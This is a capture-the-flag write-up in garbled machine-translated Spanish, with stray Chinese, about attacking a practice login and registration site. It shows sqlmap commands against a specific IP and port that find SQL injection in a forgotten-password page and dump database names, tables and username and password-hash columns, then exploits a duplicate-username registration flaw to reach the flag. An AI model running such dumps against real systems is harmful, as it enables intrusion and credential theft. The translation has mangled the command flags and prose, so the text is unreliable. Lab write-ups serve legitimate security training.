A. Introducción experimento
1. Siga las instrucciones para el experimento, hay lagunas en la página que acaba de agregar gestión de la nube industrial sistema de inicio de sesión y registro, para descubrir bandera.
Ver la entrada y registro en la inyección del primer intento de SQL, prueba manual por un largo tiempo sin uso, y le gustaría ver un sqlmap no puede ser llenado:
pitón sqlmap.py -u "http://111.198.29.45:56964/login.php" --Hojas "nombre de usuario y contraseña = 123 = 123" --dbs
No hay punto de inyección, se intuía el tema y la gente no puede ser tan fácil para nosotros para conseguir la bandera ,,,
Entonces me encontré con que hay una contraseña olvidada, es poco leído:
Aquí se ve como inyección SQL, sqlmap y luego ejecutarlo.
pitón sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" "nombre de usuario = 1" --Hojas --dbs
pitón sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" "nombre de usuario = 1" --Hojas -D cetc004 --tables 得到 usuario 表
pitón sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --Hojas "nombre de usuario = 1" --columns -D cetc004 -T usuario
pitón sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --Hojas "nombre de usuario = 1" -D cetc004 -T usuario -C "nombre de usuario, contraseña" --dump
No he tenido una cuenta registrada, y esto debe adivinar la bandera, la contraseña debe ser md5 cifrado, descifrado intentó no tuvo éxito, pero aquí no importa, donde el uso de
Se puede repetir el mismo nombre de usuario lagunas de registro, para registrar una nueva cuenta, a continuación, acceder bandera obtenido.